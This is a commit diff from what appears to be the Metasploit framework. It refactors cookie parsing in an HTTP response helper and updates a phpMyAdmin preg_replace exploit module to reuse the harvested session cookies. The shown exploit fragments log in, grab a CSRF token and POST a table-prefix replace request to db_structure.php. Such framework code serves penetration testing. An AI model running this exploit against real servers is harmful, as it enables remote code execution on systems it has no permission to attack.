Tidyup and getcookies

Author: Meatballs1

lib/rex/proto/http/response.rb

@@ -59,18 +59,22 @@ def initialize(code = 200, message = 'OK', proto = DefaultProtocol)
 	end
 
 	#
-	# Returns a cookie value from the Set-Cookie header
-	#
-	def get_cookie(cookie)
-		unless self.headers.include? 'Set-Cookie'
-			return nil
-		end
-		value = $1 if self.headers['Set-Cookie'] =~ /#{cookie}=(.*?); /i
-		if value
-			return "#{cookie}=#{value};"
-		else
-			return nil
+	# Gets cookies from the Set-Cookie header in a format to be used
+	# in the 'cookie' send_request field
+	#
+	def get_cookies
+		cookies = ""
+                if (self.headers.include?('Set-Cookie'))
+                	set_cookies = self.headers['Set-Cookie']
+			key_vals = set_cookies.scan(/\s?([^, ;]+?)=(.*?);/)
+			key_vals.each do |k, v|
+				next if k == 'path'
+				next if k == 'expires'
+				cookies << "#{k}=#{v}; "
+			end
 		end
+
+                return cookies.strip
 	end
 
 	#

modules/exploits/multi/http/phpmyadmin_preg_replace.rb

@@ -39,10 +39,6 @@ def initialize(info = {})
 				{
 					'BadChars' => "&\n=+%",
 				},
-			'DefaultOptions'  =>
-				{
-					'InitialAutoRunScript' => 'migrate -f'
-				},
 			'Targets'	 =>
 				[
 					[ 'Automatic', { } ],
@@ -93,15 +89,6 @@ def check
 	end
 
 	def exploit
-		cookie_names = [
-			'phpMyAdmin',
-			'pma_mcrypt_iv',
-			'pmaUser-1',
-			'pmaPass-1',
-			'pma_lang',
-			'pma_collation_connection'
-		]
-
 		print_status("Grabbing CSRF token")
 		response = send_request_cgi({ 'uri' => uri})
 		if response.nil?
@@ -135,16 +122,12 @@ def exploit
 
 		token = login.headers['Location'].scan(/token=(.*)[&|$]/).flatten.first
 
-		cookie = ""
-		cookie_names.each do |name|
-			c = login.get_cookie(name)
-			cookie << c << " " unless c.nil?
-		end
+		cookies = login.get_cookies
 
 		login_check = send_request_cgi({
 			'uri' => uri('index.php'),
 			'vars_get' => { 'token' => token },
-			'cookie' => cookie
+			'cookie' => cookies
 		})
 
 		if login_check.body =~ /Welcome to/
@@ -158,7 +141,7 @@ def exploit
 		exploit_result = send_request_cgi({
 			'uri'	=> uri('db_structure.php'),
 			'method' => 'POST',
-			'cookie' => cookie,
+			'cookie' => cookies,
 			'vars_post' => {
 				'query_type' => 'replace_prefix_tbl',
 				'db' => db,